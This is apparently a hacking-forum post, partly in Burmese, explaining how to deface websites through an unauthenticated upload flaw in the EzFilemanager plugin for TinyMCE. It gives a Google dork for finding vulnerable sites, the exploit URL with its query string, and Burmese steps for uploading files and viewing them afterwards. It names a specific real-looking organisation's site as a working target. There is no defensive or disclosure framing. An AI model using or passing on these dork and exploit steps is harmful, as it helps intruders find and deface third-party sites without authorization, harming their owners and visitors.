EzFilemanager Deface Upload vulnerability

Google Dork inurl:ezfilemanager/ezfilemanager.php

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php
and 

put ?sa=1&type=file after URL

now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

ကြ်န္ေတာ္တို ့ေတြအဲ့မွာ  ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files ေတြ upload တင္နုိင္မွာျဖစ္ပါတယ္...
ကြ်န္ေတာ္ကေတာ့ txt ဖုိင္ေလးဘဲတင္ျပထားတယ္..

http://www.hollywood-arts.org/tinymce/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=image
အဲ့မွာ ကြ်န္ေတာ္ အနီနဲ ့၀ုိက္ ျပထားပါတယ္.. အဲ့ဖုိင္ေတြကို ဆုိဒ္မွာ တင္ခြင့္၇ွိမွာျဖစ္ပါတယ္...
ပုံနည္းနည္းေသးသြားတယ္ဗ်ာ.. ctrl ခလုတ္ကို ဖိျပီး mouse ဘီး ေလးနဲ ့အတုိးအခ်ဲ ့လုပ္ၾကည့္လုိက္ပါ...
အဲ့မွာတင္ျပီးသြားရင္ေတာ့  browse တည္းျပန္သြားလုိက္ပါ.. သင့္ဖုိင္ေလး ေရာက္ေနတာေတြ ့ပါလိမ့္မယ္...


ကဲအဲ့ဖုိင္ေလး ကို ကလစ္နုိပ္လုိက္မယ္ဆုိရင္ေတာ့ သင္ တင္ထားတဲ့ဖုိင္ကို ျမင္ရမွာျဖစ္ပါတယ္..